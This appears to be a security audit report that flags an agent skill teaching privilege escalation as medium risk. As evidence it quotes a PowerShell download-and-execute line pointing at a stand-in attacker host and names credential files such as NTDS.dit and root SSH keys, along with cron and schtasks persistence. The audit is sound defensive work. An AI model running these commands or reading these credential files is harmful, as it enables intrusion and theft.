Privilege Escalation Methods
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
- Privilege Escalation (MEDIUM): The skill details numerous methods to gain unauthorized root or system access. Evidence includes sudo misconfigurations (vim, find, awk), capability exploits, and Windows token impersonation (SweetPotato, SharpImpersonation).
- Unverifiable Dependencies & Remote Code Execution (MEDIUM): Detects instructions to download and execute code from remote servers. Evidence: PowerShell 'iex (iwr http://attacker/shell.ps1)' patterns for payload delivery.
- Data Exposure & Exfiltration (MEDIUM): Provides commands for stealing critical system credentials and private keys. Evidence: Extraction of 'NTDS.dit', SYSTEM hives, and private SSH keys ('/root/.ssh/id_rsa').
- Persistence Mechanisms (MEDIUM): Instructions for maintaining long-term access to a system. Evidence: Use of 'schtasks' and 'cron' job injection to execute arbitrary commands.
Audit Metadata